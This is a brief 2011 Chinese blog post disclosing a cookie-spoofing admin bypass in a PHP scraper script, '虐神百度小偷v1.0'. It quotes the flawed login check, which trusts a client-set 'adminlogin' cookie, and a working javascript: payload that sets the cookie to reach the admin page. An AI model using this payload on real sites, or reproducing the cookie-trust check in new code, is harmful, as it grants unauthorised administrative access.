虐神百度小偷v1.0 cookie 欺骗

2011-11-28

老系统内容 cookie IE 百度骗欺骗

约 139 字预计阅读 1 分钟

文章目录

虐神百度小偷v1.0 cookie欺骗

本想发布歪酷CMS漏洞

怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!

此洞有点2... 毕竟是洞~ 让作者知道下也好.

<?php
if(isset($_COOKIE['adminlogin']) && $_COOKIE['adminlogin']=="1")//你懂的...
Header("Location: main.php");
else
Header("Location: login.php");
?>

javascript:alert(document.cookie="adminlogin="+escape("1"));

再浏览 127.0.0.1/admin/main.php

文章作者 wming79

上次更新 2011-11-28